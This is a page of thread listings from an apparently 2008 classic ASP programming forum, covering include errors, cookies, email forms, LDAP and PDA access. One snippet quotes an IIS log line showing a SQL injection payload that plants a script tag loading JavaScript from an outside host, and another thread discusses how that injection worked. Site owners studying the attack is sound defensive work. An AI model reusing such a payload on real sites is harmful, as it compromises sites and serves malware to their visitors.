First  |  Prev |  Next  |  Last
Pages: 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32
Can't include virtual directory
Hi I have just taken over management of a web site, many pages of which contain the line: <!--#include virtual="/admin/Includes/conn_Login.asp" --> When I try to load this page (login.asp) I get the error: Page cannot be displayed Active Server Pages, ASP 0126 (0x80004005) The include file '/admin/Includes/... 19 Jun 2008 13:43
PDA IP address
Does PDA have an IP address like a PC has? Firewall access is given to a certain IP address for PC's to access a Web application. I assume PDA also has IP address so that it can be added to the list in order to grant it access to the app. Is that correct? ... 17 Jun 2008 16:46
Checking for existence of a cookie
I tried to post this last week, but never saw it, so I hope it's not a duplicate. (Sorry if it is.) I am rewriting our member log-in page in classic ASP from PHP. We will be switching platforms next month. Every member has an access number to log in. Once they have logged in, if they accept it, a cookie is pro... 17 Jun 2008 10:38
Validation on email address
Hi, Is there a way to validate an email address and to check whether it is sendable? Function EmailTo(ToEmail, FromEmail, strSubject, strBody) Set objMessage = CreateObject("CDO.Message") objMessage.Subject = strSubject objMessage.From = FromEmail objMessage.To = ToEmail objMessage.HTMLBody ... 18 Jun 2008 23:04
How the injection worked...
Here's an example of how it was originally injected into at least one web site and thus database: http://www.aspmessageboard.com/forum/showMessage.asp?F=21&M=894997&P=1#894984 The next post is my decoding of that and then Xander's post has a link to here: http://isc.sans.org/diary.html?n&storyid=4294 that e... 2 Jul 2008 14:59
SQL Injection
- - - - - - - - - IIS Log File Entry - - - - - - - - - - - - - - - - GET /sresult.asp title=(Your%20Love%20Keeps%20Lifting%20Me)%20Higher%20And%20Higher&artist=Michael%20McDonald&type=%25&category=%25&column=t_asc%3Cscript%20src= http://www.advabnr.com/b.js%3E%3C/script%3E 80 - 76.16.112.66 HTTP/1.1 - - - - - - - ... 5 Jul 2008 12:31
LDAP version of winnt://.../user ?
I'm porting some code over to use ADS for user data lookup, but can't find a clear reference anywhere to the old windows 2000 userid (the network login). Does it still exist within LDAP, or will I have to match to sn & givenName? ... 16 Jun 2008 12:10
PDA wireless
I have a Web application that is written in ASP. It runs well on regular PC. What is needed to make it run on PDA (wireless)? I want to buy a new PDA to test the application. Is there a particular brand of PDA or operating system that I should buy? Thanks. ... 23 Jun 2008 05:33
newbiie (ish) getting the client URL when using custome errors asp ?
Im sure this is dead simple but where do you find the URL causing the error ? I am trying to catch bad directory references using IIS custom errors tab It points to my error handler eg error404.asp however when that executes Request("URL") it shows the address of the error handler not the original address... 13 Jun 2008 23:32
CDO, ASP and Email Form Problems
How do I alter the follow asp code so the from field produces the a friendly address "Name <something(a)changeme.com>" Code is presently used. <% If Request.Form("btnSend").Count > 0 Then Set objMessage = CreateObject("CDO.Message") objMessage.Subject = Request.Form("subject") objMessage.Sender = ... 17 Jun 2008 02:59
First  |  Prev |  Next  |  Last
Pages: 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32